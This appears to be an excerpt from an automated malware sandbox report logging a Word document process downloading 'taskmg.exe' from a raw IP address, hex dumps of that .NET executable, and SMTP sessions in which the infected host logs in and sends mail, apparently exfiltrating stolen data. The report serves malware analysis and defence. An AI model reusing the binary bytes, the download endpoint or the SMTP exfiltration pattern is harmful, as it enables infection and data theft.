                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 42 08 9f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 d0 0b 00 00 0a 00 00 00 00 00 00 ae ee 0b 00 00 20 00 00 00 00 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c ee 0b 00 4f 00 00 00 00 00 0c 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c cf 0b 00 00 20 00 00 00 d0 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 88 06 00 00 00 00 0c 00 00 08 00 00 00 d2 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0c 00 00 02 00 00 00 da 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 ee 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 48 01 00 a0 21 01 00 03 00 00 00 8c 01 00 06 4c 6a 02 00 10 84 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 00 ac 00 00 00 01 00 00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 2e 00 00 0a 74 04 00 00 02 0c 02 7c 07 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 30 00 00 0a 74 04 00 00 02 0c 02 7c 07 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 1b 30 03 00 f9 00 00 00 03 00 00 11 02 7b 03 00 00 04 6f 23 00 00 0a 28 31 00 00 0a 02 7b 03 00 00 04 6f 23 00 00 0a 28 32 00 00 0a 0a 06 72 01 00 00 70 28 33 00 00 0a 28 34 00 00 0a 16 73 35 00 00 0a 0b 02 7b 02 00 00 04 6f 28 00 00 0a 0c 38 89 00 00 00 12 02 28 29 00 00 0a
                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELBa0 @ @@\O H.text `.rsrc@@.reloc @BHH!Ljs}s }(!({o"*0(}-}+T{o#o$,{o#o%}+(s&}{o#{o'({,6{o(+()((*-o*{o+{o,o-}*0){(.t|(+3*0){(0t|(+3*0{o#(1{o#(2rp(3(4s5{o(8()
                                                                                                              Nov 25, 2021 18:14:54.124969006 CET3INData Raw: 0d 07 09 6f 77 02 00 06 6f 36 00 00 0a 07 1f 20 6f 37 00 00 0a 07 09 6f 76 02 00 06 6f 36 00 00 0a 09 6f 75 02 00 06 6f 17 00 00 0a 13 04 2b 35 11 04 6f 14 00 00 0a 13 05 07 1f 20 6f 37 00 00 0a 11 05 7b 98 01 00 04 2d 09 07 15 6f 36 00 00 0a 2b
                                                                                                              Data Ascii: owo6 o7ovo6ouo+5o o7{-o6+{o8o6o-,oo9(*:ko,o*(~BD80{o#(1{
                                                                                                              Nov 25, 2021 18:14:54.125030041 CET4INData Raw: 5a 00 00 0a 07 1a 6f 5b 00 00 0a 07 06 fe 06 cd 02 00 06 73 5c 00 00 0a 6f 5d 00 00 0a 02 7b 06 00 00 04 06 7b ae 01 00 04 06 7b af 01 00 04 6f 5e 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 06 7b af 01 00 04 6f 59 00 00 0a 2a 00 00 00 01 10 00 00
                                                                                                              Data Ascii: Zo[s\o]{{{o^{o,{oY*x0#}s{,{o*0K{,{-*{o,{{o_o`{{oa&(*z,{,{
                                                                                                              Nov 25, 2021 18:14:54.125087976 CET6INData Raw: 02 7b 09 00 00 04 6f 59 00 00 0a 02 7b 0d 00 00 04 20 f6 00 00 00 20 68 01 00 00 73 72 00 00 0a 6f 50 00 00 0a 02 7b 0d 00 00 04 20 94 00 00 00 6f 87 00 00 0a 02 7b 0d 00 00 04 18 6f 88 00 00 0a 02 7b 0d 00 00 04 1a 6f 73 00 00 0a 02 7b 0e 00 00
                                                                                                              Data Ascii: {oY{ hsroP{ o{o{os{Tsoop{rpoq{VGsroP{o{o{so{9soop{rpoq{;sroP{
                                                                                                              Nov 25, 2021 18:14:54.271748066 CET7INData Raw: 28 1c 00 00 06 28 46 00 00 0a 0a 03 06 16 16 6f 74 02 00 06 de 0a 06 2c 06 06 6f 12 00 00 0a dc 2a 00 01 10 00 00 02 00 45 00 0b 50 00 0a 00 00 00 00 13 30 04 00 d2 01 00 00 0a 00 00 11 12 00 0f 02 28 9e 00 00 0a 03 6f 05 02 00 06 6f e9 01 00 06
                                                                                                              Data Ascii: ((Fot,o*EP0(oooC[(oooC[(oo(,!((-}}*oooos}oooos}( _
                                                                                                              Nov 25, 2021 18:14:54.271838903 CET8INData Raw: 00 04 02 03 6f 76 02 00 06 7d 1f 00 00 04 02 02 7b 1e 00 00 04 02 7b 1f 00 00 04 73 b3 00 00 0a 7d 1d 00 00 04 03 6f 75 02 00 06 6f 17 00 00 0a 0a 2b 24 06 6f 14 00 00 0a 0b 02 7b 1d 00 00 04 07 7b 96 01 00 04 07 7b 97 01 00 04 07 7b 98 01 00 04
                                                                                                              Data Ascii: ov}{{s}ouo+$o{{{{(o-,oowoxZovoxZsM((('(Fot,os} *A0q0o(
                                                                                                              Nov 25, 2021 18:14:54.272281885 CET10INData Raw: 0a 28 3d 00 00 06 03 72 6d 02 00 70 28 c1 00 00 0a 6f c2 00 00 0a 0a 06 2c 5e 03 72 7b 02 00 70 28 c1 00 00 0a 6f c2 00 00 0a 0b 07 2d 0f 02 06 04 28 c3 00 00 0a 28 3f 00 00 06 2b 1f 04 07 6f c4 00 00 0a 28 34 00 00 0a 28 c5 00 00 0a 0c 02 06 08
                                                                                                              Data Ascii: (=rmp(o,^r{p(o-((?+o(4(((?(>oAs(*2(>o*{**"}**0}'(R(H(Co>}(sQ%{(ooX%{(ooV
                                                                                                              Nov 25, 2021 18:14:54.272474051 CET11INData Raw: 04 6f 6a 00 00 0a 02 28 6a 00 00 0a 02 7b 2e 00 00 04 1b 6f 6e 00 00 0a 02 7b 2e 00 00 04 17 6f dc 00 00 0a 02 7b 2e 00 00 04 16 16 73 6f 00 00 0a 6f 70 00 00 0a 02 7b 2e 00 00 04 72 99 02 00 70 6f 71 00 00 0a 02 7b 2e 00 00 04 20 d0 00 00 00 20
                                                                                                              Data Ascii: oj(j{.on{.o{.soop{.rpoq{. TsroP{.o{.os{.Qs\o{/on{/soop{/so{/rpoq{/so{/ asroP
                                                                                                              Nov 25, 2021 18:14:54.273787975 CET13INData Raw: 6f ed 00 00 0a 0a 2b 0b 06 6f ee 00 00 0a 6f f2 00 00 0a 06 6f 13 00 00 0a 2d ed de 0a 06 2c 06 06 6f 12 00 00 0a dc 2a 00 00 01 10 00 00 02 00 0c 00 17 23 00 0a 00 00 00 00 1e 02 28 66 00 00 06 2a 7e 02 7b 34 00 00 04 03 6f e8 00 00 0a 03 02 fe
                                                                                                              Data Ascii: o+ooo-,o*#(f*~{4oiso*F(_,(j*Z{2,{2o*z,{6,{6o(*2s}6*f(}8s}7*{8X}8{7{8o
                                                                                                              Nov 25, 2021 18:14:54.273843050 CET14INData Raw: 06 73 5c 00 00 0a 28 06 01 00 0a 02 16 28 98 00 00 0a 2a 1e 02 28 9b 00 00 0a 2a 1e 02 7b 51 00 00 04 2a 9a 02 03 7d 51 00 00 04 02 28 a0 00 00 06 02 7b 55 00 00 04 02 7b 51 00 00 04 18 2e 03 17 2b 01 16 6f 07 01 00 0a 2a 46 02 7b 62 00 00 04 6f
                                                                                                              Data Ascii: s\((*(*{Q*}Q({U{Q.+o*F{bo(*J{b(o*F{Xoo*6{Xo*F{Yoo*6{Yo*F{\o(*J{\(o*F{]o(*J{](
                                                                                                              Nov 25, 2021 18:14:54.273931026 CET15INData Raw: 00 0a 02 7b 54 00 00 04 72 79 01 00 70 6f 71 00 00 0a 02 7b 54 00 00 04 1f 47 1f 0d 73 72 00 00 0a 6f 50 00 00 0a 02 7b 54 00 00 04 16 6f 73 00 00 0a 02 7b 54 00 00 04 72 49 04 00 70 6f 78 00 00 0a 02 7b 55 00 00 04 17 6f dc 00 00 0a 02 7b 55 00
                                                                                                              Data Ascii: {Trypoq{TGsroP{Tos{TrIpox{Uo{Uo#%rgp%rpo"{U\soop{Urpoq{URsroP{Uos{Us\o#{V-soop{Vrpoq


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              1192.168.2.2249166173.232.204.8980C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 25, 2021 18:14:59.854968071 CET821OUTGET /taskmg.exe HTTP/1.1
                                                                                                              Host: 173.232.204.89
                                                                                                              Connection: Keep-Alive
                                                                                                              Nov 25, 2021 18:15:00.005897045 CET822INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.19.9
                                                                                                              Date: Thu, 25 Nov 2021 17:14:59 GMT
                                                                                                              Content-Type: application/octet-stream
                                                                                                              Content-Length: 777216
                                                                                                              Last-Modified: Thu, 25 Nov 2021 03:51:30 GMT
                                                                                                              Connection: keep-alive
                                                                                                              ETag: "619f0842-bdc00"
                                                                                                              Accept-Ranges: bytes
                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 42 08 9f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 d0 0b 00 00 0a 00 00 00 00 00 00 ae ee 0b 00 00 20 00 00 00 00 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c ee 0b 00 4f 00 00 00 00 00 0c 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c cf 0b 00 00 20 00 00 00 d0 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 88 06 00 00 00 00 0c 00 00 08 00 00 00 d2 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0c 00 00 02 00 00 00 da 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 ee 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 48 01 00 a0 21 01 00 03 00 00 00 8c 01 00 06 4c 6a 02 00 10 84 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 00 ac 00 00 00 01 00 00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 2e 00 00 0a 74 04 00 00 02 0c 02 7c 07 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 30 00 00 0a 74 04 00 00 02 0c 02 7c 07 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 1b 30 03 00 f9 00 00 00 03 00 00 11 02 7b 03 00 00 04 6f 23 00 00 0a 28 31 00 00 0a 02 7b 03 00 00 04 6f 23 00 00 0a 28 32 00 00 0a 0a 06 72 01 00 00 70 28 33 00 00 0a 28 34 00 00 0a 16 73 35 00 00 0a 0b 02 7b 02 00 00 04 6f 28 00 00 0a 0c 38 89 00 00 00 12 02 28 29 00 00 0a
                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELBa0 @ @@\O H.text `.rsrc@@.reloc @BHH!Ljs}s }(!({o"*0(}-}+T{o#o$,{o#o%}+(s&}{o#{o'({,6{o(+()((*-o*{o+{o,o-}*0){(.t|(+3*0){(0t|(+3*0{o#(1{o#(2rp(3(4s5{o(8()
                                                                                                              Nov 25, 2021 18:15:00.005935907 CET824INData Raw: 0d 07 09 6f 77 02 00 06 6f 36 00 00 0a 07 1f 20 6f 37 00 00 0a 07 09 6f 76 02 00 06 6f 36 00 00 0a 09 6f 75 02 00 06 6f 17 00 00 0a 13 04 2b 35 11 04 6f 14 00 00 0a 13 05 07 1f 20 6f 37 00 00 0a 11 05 7b 98 01 00 04 2d 09 07 15 6f 36 00 00 0a 2b
                                                                                                              Data Ascii: owo6 o7ovo6ouo+5o o7{-o6+{o8o6o-,oo9(*:ko,o*(~BD80{o#(1{
                                                                                                              Nov 25, 2021 18:15:00.005958080 CET825INData Raw: 5a 00 00 0a 07 1a 6f 5b 00 00 0a 07 06 fe 06 cd 02 00 06 73 5c 00 00 0a 6f 5d 00 00 0a 02 7b 06 00 00 04 06 7b ae 01 00 04 06 7b af 01 00 04 6f 5e 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 06 7b af 01 00 04 6f 59 00 00 0a 2a 00 00 00 01 10 00 00
                                                                                                              Data Ascii: Zo[s\o]{{{o^{o,{oY*x0#}s{,{o*0K{,{-*{o,{{o_o`{{oa&(*z,{,{
                                                                                                              Nov 25, 2021 18:15:00.005979061 CET826INData Raw: 02 7b 09 00 00 04 6f 59 00 00 0a 02 7b 0d 00 00 04 20 f6 00 00 00 20 68 01 00 00 73 72 00 00 0a 6f 50 00 00 0a 02 7b 0d 00 00 04 20 94 00 00 00 6f 87 00 00 0a 02 7b 0d 00 00 04 18 6f 88 00 00 0a 02 7b 0d 00 00 04 1a 6f 73 00 00 0a 02 7b 0e 00 00
                                                                                                              Data Ascii: {oY{ hsroP{ o{o{os{Tsoop{rpoq{VGsroP{o{o{so{9soop{rpoq{;sroP{
                                                                                                              Nov 25, 2021 18:15:00.160995960 CET828INData Raw: 28 1c 00 00 06 28 46 00 00 0a 0a 03 06 16 16 6f 74 02 00 06 de 0a 06 2c 06 06 6f 12 00 00 0a dc 2a 00 01 10 00 00 02 00 45 00 0b 50 00 0a 00 00 00 00 13 30 04 00 d2 01 00 00 0a 00 00 11 12 00 0f 02 28 9e 00 00 0a 03 6f 05 02 00 06 6f e9 01 00 06
                                                                                                              Data Ascii: ((Fot,o*EP0(oooC[(oooC[(oo(,!((-}}*oooos}oooos}( _
                                                                                                              Nov 25, 2021 18:15:00.161031008 CET829INData Raw: 00 04 02 03 6f 76 02 00 06 7d 1f 00 00 04 02 02 7b 1e 00 00 04 02 7b 1f 00 00 04 73 b3 00 00 0a 7d 1d 00 00 04 03 6f 75 02 00 06 6f 17 00 00 0a 0a 2b 24 06 6f 14 00 00 0a 0b 02 7b 1d 00 00 04 07 7b 96 01 00 04 07 7b 97 01 00 04 07 7b 98 01 00 04
                                                                                                              Data Ascii: ov}{{s}ouo+$o{{{{(o-,oowoxZovoxZsM((('(Fot,os} *A0q0o(
                                                                                                              Nov 25, 2021 18:15:00.161055088 CET831INData Raw: 0a 28 3d 00 00 06 03 72 6d 02 00 70 28 c1 00 00 0a 6f c2 00 00 0a 0a 06 2c 5e 03 72 7b 02 00 70 28 c1 00 00 0a 6f c2 00 00 0a 0b 07 2d 0f 02 06 04 28 c3 00 00 0a 28 3f 00 00 06 2b 1f 04 07 6f c4 00 00 0a 28 34 00 00 0a 28 c5 00 00 0a 0c 02 06 08
                                                                                                              Data Ascii: (=rmp(o,^r{p(o-((?+o(4(((?(>oAs(*2(>o*{**"}**0}'(R(H(Co>}(sQ%{(ooX%{(ooV
                                                                                                              Nov 25, 2021 18:15:00.161077976 CET832INData Raw: 04 6f 6a 00 00 0a 02 28 6a 00 00 0a 02 7b 2e 00 00 04 1b 6f 6e 00 00 0a 02 7b 2e 00 00 04 17 6f dc 00 00 0a 02 7b 2e 00 00 04 16 16 73 6f 00 00 0a 6f 70 00 00 0a 02 7b 2e 00 00 04 72 99 02 00 70 6f 71 00 00 0a 02 7b 2e 00 00 04 20 d0 00 00 00 20
                                                                                                              Data Ascii: oj(j{.on{.o{.soop{.rpoq{. TsroP{.o{.os{.Qs\o{/on{/soop{/so{/rpoq{/so{/ asroP
                                                                                                              Nov 25, 2021 18:15:00.161099911 CET833INData Raw: 6f ed 00 00 0a 0a 2b 0b 06 6f ee 00 00 0a 6f f2 00 00 0a 06 6f 13 00 00 0a 2d ed de 0a 06 2c 06 06 6f 12 00 00 0a dc 2a 00 00 01 10 00 00 02 00 0c 00 17 23 00 0a 00 00 00 00 1e 02 28 66 00 00 06 2a 7e 02 7b 34 00 00 04 03 6f e8 00 00 0a 03 02 fe
                                                                                                              Data Ascii: o+ooo-,o*#(f*~{4oiso*F(_,(j*Z{2,{2o*z,{6,{6o(*2s}6*f(}8s}7*{8X}8{7{8o
                                                                                                              Nov 25, 2021 18:15:00.161124945 CET835INData Raw: 06 73 5c 00 00 0a 28 06 01 00 0a 02 16 28 98 00 00 0a 2a 1e 02 28 9b 00 00 0a 2a 1e 02 7b 51 00 00 04 2a 9a 02 03 7d 51 00 00 04 02 28 a0 00 00 06 02 7b 55 00 00 04 02 7b 51 00 00 04 18 2e 03 17 2b 01 16 6f 07 01 00 0a 2a 46 02 7b 62 00 00 04 6f
                                                                                                              Data Ascii: s\((*(*{Q*}Q({U{Q.+o*F{bo(*J{b(o*F{Xoo*6{Xo*F{Yoo*6{Yo*F{\o(*J{\(o*F{]o(*J{](
                                                                                                              Nov 25, 2021 18:15:00.161149025 CET836INData Raw: 00 0a 02 7b 54 00 00 04 72 79 01 00 70 6f 71 00 00 0a 02 7b 54 00 00 04 1f 47 1f 0d 73 72 00 00 0a 6f 50 00 00 0a 02 7b 54 00 00 04 16 6f 73 00 00 0a 02 7b 54 00 00 04 72 49 04 00 70 6f 78 00 00 0a 02 7b 55 00 00 04 17 6f dc 00 00 0a 02 7b 55 00
                                                                                                              Data Ascii: {Trypoq{TGsroP{Tos{TrIpox{Uo{Uo#%rgp%rpo"{U\soop{Urpoq{URsroP{Uos{Us\o#{V-soop{Vrpoq


                                                                                                              SMTP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                              Nov 25, 2021 18:15:49.911569118 CET58749167208.91.199.224192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                              Nov 25, 2021 18:15:49.912316084 CET49167587192.168.2.22208.91.199.224EHLO 141700
                                                                                                              Nov 25, 2021 18:15:50.060368061 CET58749167208.91.199.224192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 41648128
                                                                                                              250-VRFY
                                                                                                              250-ETRN
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH PLAIN LOGIN
                                                                                                              250-AUTH=PLAIN LOGIN
                                                                                                              250-ENHANCEDSTATUSCODES
                                                                                                              250-8BITMIME
                                                                                                              250 DSN
                                                                                                              Nov 25, 2021 18:15:50.062571049 CET49167587192.168.2.22208.91.199.224AUTH login bS1rb25pZWN6bnlAZXVyb3BlY2VsbC5ldQ==
                                                                                                              Nov 25, 2021 18:15:50.211478949 CET58749167208.91.199.224192.168.2.22334 UGFzc3dvcmQ6
                                                                                                              Nov 25, 2021 18:15:50.364773989 CET58749167208.91.199.224192.168.2.22235 2.7.0 Authentication successful
                                                                                                              Nov 25, 2021 18:15:50.365942955 CET49167587192.168.2.22208.91.199.224MAIL FROM:<m-konieczny@europecell.eu>
                                                                                                              Nov 25, 2021 18:15:50.514678001 CET58749167208.91.199.224192.168.2.22250 2.1.0 Ok
                                                                                                              Nov 25, 2021 18:15:50.515450954 CET49167587192.168.2.22208.91.199.224RCPT TO:<m-konieczny@europecell.eu>
                                                                                                              Nov 25, 2021 18:15:50.675885916 CET58749167208.91.199.224192.168.2.22250 2.1.5 Ok
                                                                                                              Nov 25, 2021 18:15:50.676439047 CET49167587192.168.2.22208.91.199.224DATA
                                                                                                              Nov 25, 2021 18:15:50.825654030 CET58749167208.91.199.224192.168.2.22354 End data with <CR><LF>.<CR><LF>
                                                                                                              Nov 25, 2021 18:15:51.866069078 CET58749167208.91.199.224192.168.2.22250 2.0.0 Ok: queued as 92DD13A1A86
                                                                                                              Nov 25, 2021 18:16:00.303539991 CET58749168208.91.199.225192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                              Nov 25, 2021 18:16:00.303939104 CET49168587192.168.2.22208.91.199.225EHLO 141700
                                                                                                              Nov 25, 2021 18:16:00.456043005 CET58749168208.91.199.225192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 41648128
                                                                                                              250-VRFY
                                                                                                              250-ETRN
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH PLAIN LOGIN
                                                                                                              250-AUTH=PLAIN LOGIN
                                                                                                              250-ENHANCEDSTATUSCODES
                                                                                                              250-8BITMIME
                                                                                                              250 DSN
                                                                                                              Nov 25, 2021 18:16:00.456239939 CET49168587192.168.2.22208.91.199.225AUTH login bS1rb25pZWN6bnlAZXVyb3BlY2VsbC5ldQ==
                                                                                                              Nov 25, 2021 18:16:00.609339952 CET58749168208.91.199.225192.168.2.22334 UGFzc3dvcmQ6
                                                                                                              Nov 25, 2021 18:16:00.764110088 CET58749168208.91.199.225192.168.2.22235 2.7.0 Authentication successful
                                                                                                              Nov 25, 2021 18:16:00.764594078 CET49168587192.168.2.22208.91.199.225MAIL FROM:<m-konieczny@europecell.eu>
                                                                                                              Nov 25, 2021 18:16:00.918028116 CET58749168208.91.199.225192.168.2.22250 2.1.0 Ok
                                                                                                              Nov 25, 2021 18:16:00.918572903 CET49168587192.168.2.22208.91.199.225RCPT TO:<m-konieczny@europecell.eu>
                                                                                                              Nov 25, 2021 18:16:01.078608990 CET58749168208.91.199.225192.168.2.22250 2.1.5 Ok
                                                                                                              Nov 25, 2021 18:16:01.079021931 CET49168587192.168.2.22208.91.199.225DATA
                                                                                                              Nov 25, 2021 18:16:01.231420994 CET58749168208.91.199.225192.168.2.22354 End data with <CR><LF>.<CR><LF>
                                                                                                              Nov 25, 2021 18:16:02.157263994 CET49168587192.168.2.22208.91.199.225.
                                                                                                              Nov 25, 2021 18:16:02.454163074 CET58749168208.91.199.225192.168.2.22250 2.0.0 Ok: queued as 00FA11D7F9C
                                                                                                              Nov 25, 2021 18:16:12.105878115 CET49168587192.168.2.22208.91.199.225QUIT
                                                                                                              Nov 25, 2021 18:16:12.258209944 CET58749168208.91.199.225192.168.2.22221 2.0.0 Bye
                                                                                                              Nov 25, 2021 18:16:12.800467968 CET58749169208.91.199.223192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                              Nov 25, 2021 18:16:12.800950050 CET49169587192.168.2.22208.91.199.223EHLO 141700
                                                                                                              Nov 25, 2021 18:16:12.952631950 CET58749169208.91.199.223192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 41648128
                                                                                                              250-VRFY
                                                                                                              250-ETRN
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH PLAIN LOGIN
                                                                                                              250-AUTH=PLAIN LOGIN
                                                                                                              250-ENHANCEDSTATUSCODES
                                                                                                              250-8BITMIME
                                                                                                              250 DSN
                                                                                                              Nov 25, 2021 18:16:12.952924013 CET49169587192.168.2.22208.91.199.223AUTH login bS1rb25pZWN6bnlAZXVyb3BlY2VsbC5ldQ==
                                                                                                              Nov 25, 2021 18:16:13.106471062 CET58749169208.91.199.223192.168.2.22334 UGFzc3dvcmQ6
                                                                                                              Nov 25, 2021 18:16:13.261068106 CET58749169208.91.199.223192.168.2.22235 2.7.0 Authentication successful
                                                                                                              Nov 25, 2021 18:16:13.261806011 CET49169587192.168.2.22208.91.199.223MAIL FROM:<m-konieczny@europecell.eu>
                                                                                                              Nov 25, 2021 18:16:13.414693117 CET58749169208.91.199.223192.168.2.22250 2.1.0 Ok
                                                                                                              Nov 25, 2021 18:16:13.415137053 CET49169587192.168.2.22208.91.199.223RCPT TO:<m-konieczny@europecell.eu>
                                                                                                              Nov 25, 2021 18:16:13.579514980 CET58749169208.91.199.223192.168.2.22250 2.1.5 Ok
                                                                                                              Nov 25, 2021 18:16:13.580049038 CET49169587192.168.2.22208.91.199.223DATA
                                                                                                              Nov 25, 2021 18:16:13.732167006 CET58749169208.91.199.223192.168.2.22354 End data with <CR><LF>.<CR><LF>
                                                                                                              Nov 25, 2021 18:16:15.341310978 CET58749169208.91.199.223192.168.2.22250 2.0.0 Ok: queued as 7AAA4DA296
                                                                                                              Nov 25, 2021 18:16:21.787130117 CET58749170208.91.199.224192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                              Nov 25, 2021 18:16:47.266040087 CET58749172208.91.199.224192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
